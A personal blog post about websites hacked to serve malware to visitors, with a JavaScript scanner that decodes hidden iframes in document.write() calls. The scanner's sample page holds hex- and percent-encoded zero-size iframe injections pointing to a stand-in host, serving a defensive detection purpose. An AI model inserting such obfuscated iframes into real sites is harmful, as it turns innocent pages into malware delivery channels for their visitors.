This is the first post of a new blog.
I'm writing because I'm sometimes asked
to rid someone of malware on their website.
Also, I like to keep my own personal computer
malware free.
Malware can be a virus or it can be spyware.
Malware is software that is evil.
Recently, I was sent an inquiry by someone
whose website was hacked and malware installed.
Or more precisely, the website was hacked so
that the website would serve as a vehicle to
install malware on other people's computers.
The strategy?
Take an innocent website and use it to install
malware on the computers of web visitors that
happen to visit this site.
In many, many cases, the website owner is as much
an innocent and injured victim as his web visitors
are.
Website owners contact me asking for help with this
problem.
In one recent case, the website was hacked and the
.htaccess file was compromised.
In another case, the compromised website had a JavaScript
document.write() call that had a hexadecimal-encoded
URL in it.
The strategy in both cases?
Set up a frame or iframe URL that addresses a website
that installs malware.
The advantage of this approach, from the bad guys' point
of view, is that the website that has been hacked and
compromised appears innocent.
There are no indicators that you are visiting a hacked
and compromised site.
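For a site owner checking their own pages, here is one way to look for the document.write() pattern described above. This is an added example, not code from either of the cases in this post; the sample page, the bad.example and maps.example addresses, and the function names are all made up for illustration.

```javascript
// Constructed sample page: line 2 hides the URL with \x escapes, line 3
// percent-encodes the whole tag, line 4 is an ordinary visible embed.
const SAMPLE_PAGE = [
  String.raw`<script>document.write("<p>Welcome</p>");</script>`,
  String.raw`<script>document.write('<iframe src="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x64\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2f" width="0" height="0"></iframe>');</script>`,
  String.raw`<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//bad.example/b%22%3E%3C/iframe%3E"));</script>`,
  String.raw`<script>document.write('<iframe src="https://maps.example/embed"></iframe>');</script>`,
].join("\n");

// Decode \xNN, \uNNNN and %NN escapes so the text reads as the browser sees it.
function decodeEscapes(text) {
  const toChar = (_, hex) => String.fromCharCode(parseInt(hex, 16));
  return text
    .replace(/\\x([0-9a-f]{2})/gi, toChar)
    .replace(/\\u([0-9a-f]{4})/gi, toChar)
    .replace(/%([0-9a-f]{2})/gi, toChar);
}

// Return one finding per frame/iframe src found inside a document.write()
// argument after decoding. "obfuscated" is true when the URL cannot be read
// in the file as stored, which is the case worth a closer look.
function findHiddenFrames(source) {
  const findings = [];
  const callRe = /document\.write(?:ln)?\s*\(([\s\S]*?)\)\s*;/g;
  const frameRe = /<i?frame\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let call;
  while ((call = callRe.exec(source)) !== null) {
    const raw = call[1];
    const decoded = decodeEscapes(raw);
    const line = source.slice(0, call.index).split("\n").length;
    frameRe.lastIndex = 0;
    let frame;
    while ((frame = frameRe.exec(decoded)) !== null) {
      findings.push({ line, url: frame[1], obfuscated: !raw.includes(frame[1]) });
    }
  }
  return findings;
}

// Show only the frames whose address was hidden in the stored file.
console.log(findHiddenFrames(SAMPLE_PAGE).filter((f) => f.obfuscated));
```

A visible iframe such as a map embed is reported too, but with obfuscated set to false, so the list can be reviewed against the embeds the owner knows they added.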
Google to the rescue!
Google now identifies sites that have been compromised.
Google identifies these sites as sites that may damage
your computer. In some cases, Google goes so far as
to suggest that you visit another site.
Google makes this identification via its search results.
That is to say, on any given search, Google may
identify certain sites as being malware sites.
I don't consider myself an expert on malware. One of
my primary motives for starting this blog is to educate
myself further.
As I learn more, I'll write more.
Ed Abbott